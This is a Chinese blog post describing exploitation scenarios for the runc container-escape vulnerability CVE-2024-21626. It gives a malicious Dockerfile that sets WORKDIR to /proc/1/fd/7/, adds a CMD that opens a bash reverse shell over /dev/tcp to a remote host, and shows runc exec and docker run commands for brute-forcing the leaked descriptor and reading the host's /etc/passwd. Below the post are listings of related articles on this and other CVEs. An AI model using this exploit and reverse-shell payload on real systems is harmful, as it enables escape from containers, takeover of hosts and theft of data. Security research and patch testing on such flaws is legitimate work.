CVE-2024-21626 利用场景

已于 2024-02-02 12:17:31 修改
阅读量1.2k 收藏 1
点赞数 4
文章标签: 安全
于 2024-02-01 10:23:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/135968001
版权

1.恶意镜像
不管是直接输入dockerfile还是从镜像仓库拉取镜像,都是可以利用的

FROM ubuntu:18.04
WORKDIR /proc/1/fd/7/

docker build .
docker run imageid ls   ../../../

对于业务来说,给一个上面的恶意镜像,然后可以加一个CMD 反弹shell

FROM ubuntu:18.04
WORKDIR /proc/1/fd/7/
CMD /bin/bash -c 'bash -i >&/dev/tcp/ip/8000 0>&1'

2.控制working DIr
这个场景还比较常见

runc exec --cwd /proc/1/fd/7/ demo ls ../../../../

有些产品可以指定working Dir 也就是cwd 那么也受影响,可以关注一下启动时候的参数 能不能控制working dir

几个问题
1.确定cgroup的fd
一般来说,受影响的runc 范围内
runc create demo
runc exec demo ls /proc/1/fd -la 可以直接看到对应的符号链接

对于docker来说,不容易直接看到,可以爆破
docker run -w /proc/1/fd/n ubuntu:18.04 ls …/…/…/…/
2.路径问题
当设置了正确的dockerfile之后
docker run ubuntu:18.04 cat etc/passwd 是宿主机
docker run ubuntu:18.04 cat /etc/passwd 是容器
不能使用绝对路径,绝对路径还是在容器的命名空间

azraelxuemo
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2024-21626 容器逃逸漏洞+修复方式
xdxghy0921
02-08 3123
CVE-2024-21626处理方案
Docker容器逃逸漏洞-CVE-2024-21626
墨痕诉清风的博客
07-23 369
Snyk 在 Docker 引擎以及其他容器化技术(例如 Kubernetes)使用的 runc <=1.1.11 的所有版本中发现了一个漏洞。利用此问题可能会导致容器逃逸到底层主机操作系统,无论是通过执行恶意映像还是使用恶意 Dockerfile 或上游映像构建映像(即使用时FROM)
runc 文件描述符泄漏导致容器逃逸漏洞(CVE-2024-21626
小小的木头人的博客
05-08 720
升级runc版本号 >= 1.1.12。
【Linux】修复 runc 文件描述符泄漏导致容器逃逸漏洞(CVE-2024-21626)
weixin_47610533的博客
07-17 791
在runc 1.1.11 及之前的版本中,由于内部文件描述符泄露的问题,攻击者可以让新生成的容器进程在宿主文件系统命名空间中拥有工作目录,从而允许通过访问宿主文件系统实现容器逃逸等用需要具体的环境,例如允许攻击者提供自定义镜像等。官方已于2024年2月1日发布安全更新,建议相关受影响用户升级。
容器逃逸漏洞CVE-2024-21626分析
SHELLCODE_8BIT的博客
02-01 716
增加了验证逻辑如下。
runC高危漏洞(CVE-2024-21626)涉及Docker、Containerd、Kubernetes
iwalkman的博客
02-02 753
受影响的runc版本:1.0.0-rc93 <= runc <= 1.1.11,暴露到外网的务必升级。
runc 文件描述符泄漏漏洞(CVE-2024-21626)及处理方法
weixin_43962030的博客
04-02 1543
runc 文件描述符泄漏漏洞及处理方法
CVE-2022-21661
热门推荐
Battery的博客
11-23 11万+
2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。
CVE-2024-22252、CVE-2024-22253、CVE-2024-22254
m0_61369360的博客
04-07 798
")二、影响和修正版本。
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2025
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)分析与复现
课嗨教育的专栏
06-24 176
说白了其实就是windows对于不同编码字符集之间转化的一个特性,可能大家对于Best-Fit很陌生,如果换一个词叫做宽字节,我想大家就会很熟悉了,说白了就是。
CVE-2020-1938.zip
04-15
2. 禁用不必要的AJP连接器,如果业务场景中并不需要AJP协议进行通信,可以彻底关闭它以防止被利用。 3. 限制AJP连接器的访问权限,仅允许特定的IP地址或网络段访问,以减少暴露面。 4. 对服务器进行定期的安全审计和...
【系统安全】Windows 远程桌面授权服务(RDL)远程代码执行漏洞(CVE-2024-38077)
做自己喜欢的事,并将其发挥到极致!
08-14 269
Windows远程桌面授权服务(RDL)是一个用于管理远程桌面服务许可证的组件,确保对远程桌面连接的合法性。该服务被广泛部署于开启了Windows远程桌面服务(3389端口)的服务器上,但漏洞的利用不是通过3389端口,需要先连接135端口发送访问请求,然后服务器给出一个连接RDL服务的动态高端口,再连接访问,如果服务器对外不开放135端口则不可利用
网络安全最全CVE-2024-3580 Cisco ASA安全软件XSS漏洞(1)
2401_84301948的博客
05-04 1139
Cisco ASA软件、FTD软件是运行在Cisco设备上的通用软件,主要用于服务用户防御和监控网络内部的攻击。Cisco ASA软件、FTD软件因在设备生产时集成,根据用户使用习惯未能得到实时的升级,近期的漏洞利用代码公开,导致攻击者极易利用该漏洞实施攻击。对此,360CERT建议广大用户及时将升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
CVE-2024-21626】容器逃逸漏洞修复
s_alted的博客
02-21 1490
简单来讲,是一个用 Go 语言编写的 CLI 工具,它利用 Linux 的核心功能(如 cgroups 和命名空间)来创建和运行容器。由于runc内部不正确处理文件描述符,导致泄漏关键的宿主机文件描述符到容器中。攻击1: 利用文件描述符泄漏,特权用户执行恶意容器镜像,导致 pid1 进程在宿主机挂载命名空间中拥有工作目录,从而允许对整个宿主文件系统的访问。攻击2: 在runc exec中存在文件描述符泄漏和工作目录验证不足,攻击者可通过符号链接将路径替换为。
docker runc 文件描述符泄漏导致容器逃逸漏洞(CVE-2024-21626
九术沫的博客
03-08 1509
containerd
云小课|Runc容器逃逸漏洞(CVE-2024-21626安全风险通告
Karka_的博客
03-27 639
runc是一个根据OCI(Open Container Initiative)标准创建并运行容器的CLItool,目前Docker、Containerd、CRI-O和Podman等容器都运行在runc之上。
runc 文件描述符泄漏漏洞(CVE-2024-21626
云深海阔专栏
02-20 702
将我们runc的版本升级到1.1.12。2、下载最新的runc二进制文件。3、查看最新的runc版本号。1、查看现有的版本号。
CVE-2024-21733 复现一下
最新发布
08-22
CVE-2024-21733是一个安全漏洞的编号,它通常涉及软件系统中的错误,可能导致未经授权的访问、数据泄露或其他形式的安全风险。由于这是一个具体的漏洞ID,复现它的过程通常是针对受影响软件的具体步骤,包括: 1. ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值